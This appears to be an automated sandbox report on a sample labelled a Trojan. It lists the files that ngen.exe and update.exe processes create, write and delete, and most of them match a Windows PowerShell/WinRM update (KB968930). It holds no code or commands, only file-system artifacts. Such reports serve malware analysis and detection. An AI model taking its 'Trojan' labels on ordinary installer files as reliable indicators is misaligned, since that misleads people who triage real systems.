C:\ea4acb66495575d6b9f323\powershellcore.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.dll (0 bytes)
C:\ea4acb66495575d6b9f323\dotnettypes.format.ps1xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_join.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_ref.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmres.dll (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.gpowershell.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\windowspowershellhelp.chm (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\ea4acb66495575d6b9f323\about_while.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\windowsremotemanagement.adm (0 bytes)
C:\ea4acb66495575d6b9f323\about_hash_tables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshplugin.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_reserved_words.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmanhttpconfig.exe (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.inf (0 bytes)
C:\ea4acb66495575d6b9f323\system.management.automation.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_data_sections.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.security.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\powershell_ise.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_operators.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wtrinstaller.ico (0 bytes)
C:\ea4acb66495575d6b9f323\about_quoting_rules.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\kb968930xp.cat (0 bytes)
C:\ea4acb66495575d6b9f323 (0 bytes)
C:\ea4acb66495575d6b9f323\about_remote_faq.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_variables.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\update\update.ver (0 bytes)
C:\ea4acb66495575d6b9f323\about_functions_cmdletbindingattribute.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\microsoft.powershell.graphicalhost.resources.dll (0 bytes)
C:\ea4acb66495575d6b9f323\winrmprov.mof (0 bytes)
C:\ea4acb66495575d6b9f323\about_requires.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\wsmauto.mof (0 bytes)
C:\ea4acb66495575d6b9f323\about_line_editing.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_core_commands.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_scopes.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pspluginwkr.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_modules.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_if.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\about_pssessions.help.txt (0 bytes)
C:\ea4acb66495575d6b9f323\pwrshmsg.dll (0 bytes)
C:\ea4acb66495575d6b9f323\about_parameters.help.txt (0 bytes)

The process ngen.exe:3596 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)

The process ngen.exe:3168 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (752 bytes)

The process ngen.exe:3676 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)

The process ngen.exe:3300 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)

The process ngen.exe:856 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (782 bytes)

The process ngen.exe:2988 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1454 bytes)

The process ngen.exe:3172 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1074 bytes)

The process ngen.exe:1960 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1396 bytes)

The process ngen.exe:1944 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (714 bytes)

The process ngen.exe:420 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1112 bytes)

The process ngen.exe:916 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)

The process ngen.exe:3936 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)

The process ngen.exe:3996 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)

The process ngen.exe:1868 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)

The process ngen.exe:2188 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1442 bytes)

The process ngen.exe:2952 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1152 bytes)

The process ngen.exe:3560 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)

The process ngen.exe:3224 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)

The process ngen.exe:1724 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)

The process ngen.exe:3220 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)

The process ngen.exe:1976 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)

The process ngen.exe:2164 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (794 bytes)

The process ngen.exe:648 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (458 bytes)

The process update.exe:4040 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%System%\GroupPolicy\Adm\SET3B.tmp (2 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (20 bytes)
%System%\SET12.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (4 bytes)
%System%\SET1B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (10 bytes)
%WinDir%\inf\SET1D.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (3 bytes)
%System%\SET1A.tmp (789 bytes)
%WinDir%\Help\SETCA.tmp (12287 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (950 bytes)
%WinDir%\SECD5.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (18248 bytes)
%System%\winrm\0409\SET22.tmp (601 bytes)
%System%\SET36.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (6 bytes)
%System%\SET25.tmp (2 bytes)
%System%\SET13.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (17 bytes)
%System%\SET14.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (10177 bytes)
%WinDir%\inf\SET1E.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (2 bytes)
%System%\SET2A.tmp (1281 bytes)
%System%\SETC4.tmp (42 bytes)
%System%\SET19.tmp (25 bytes)
%WinDir%\ntdtcsetup.log (22691 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\SET2D.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (13 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (27 bytes)
%System%\SET33.tmp (25 bytes)
%WinDir%\msmqinst.log (5398 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (24 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (15 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (3 bytes)
%System%\SETB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (438 bytes)
%System%\SET2B.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (1 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (3361 bytes)
%System%\SET2E.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETD1.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (17 bytes)
%System%\SETE.tmp (673 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (22 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (49 bytes)
%System%\wbem\SET23.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\SET17.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (7971 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (5 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (21 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5705 bytes)
%System%\SET34.tmp (789 bytes)
%System%\SET18.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (2 bytes)
%System%\SET27.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (1 bytes)
%System%\SET11.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (673 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (1425 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (11 bytes)
%System%\SET35.tmp (14 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (16 bytes)
%System%\SET10.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (40 bytes)
%System%\SET26.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (8 bytes)
%System%\config\system (3251 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (57 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (2321 bytes)
%System%\SET32.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (4 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (8 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\wbem\SET9.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (7 bytes)
%System%\SET16.tmp (12 bytes)
%System%\winrm\0409\SET3C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (1425 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (12 bytes)
%WinDir%\iis6.log (139812 bytes)
%WinDir%\comsetup.log (49682 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (19 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (61 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (10 bytes)
%System%\SET28.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SETCF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (5 bytes)
%System%\SET31.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (23 bytes)
%System%\GroupPolicy\Adm\SET21.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC7.tmp (601 bytes)
%System%\SET29.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETD0.tmp (40 bytes)
%System%\SET2C.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (4 bytes)
%WinDir%\KB968930.log (245066 bytes)
%System%\SET15.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC3.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (13 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\SET24.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (10 bytes)
%System%\SET1C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (12 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (5 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (11 bytes)
%System%\SETD.tmp (1281 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\SETC.tmp (35 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (601 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (9 bytes)
%WinDir%\inf\SET37.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (24 bytes)
%WinDir%\inf\SET38.tmp (12 bytes)
%System%\SET2F.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (22 bytes)
%System%\SET30.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (5 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC6.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC0.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (12 bytes)
%System%\GroupPolicy\Adm\SET1F.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (6 bytes)
%System%\GroupPolicy\Adm\SET20.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (2 bytes)

The Trojan deletes the following file(s):

%System%\GroupPolicy\Adm\SET3B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%WinDir%\inf\SET1D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\SET1A.tmp (0 bytes)
%WinDir%\Help\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC5.tmp (0 bytes)
%WinDir%\SECD5.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\winrm\0409\SET22.tmp (0 bytes)
%System%\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETC1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET1E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%System%\SETC4.tmp (0 bytes)
%System%\SET19.tmp (0 bytes)
%System%\SET1B.tmp (0 bytes)
%System%\SET2D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\SET33.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\wbem\SET23.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\SET34.tmp (0 bytes)
%System%\SET18.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET3A.tmp (0 bytes)
%WinDir%\Temp\UPD8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (0 bytes)
%System%\SET35.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETD2.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC8.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBD.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\SET32.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET39.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\wbem\SET9.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\winrm\0409\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
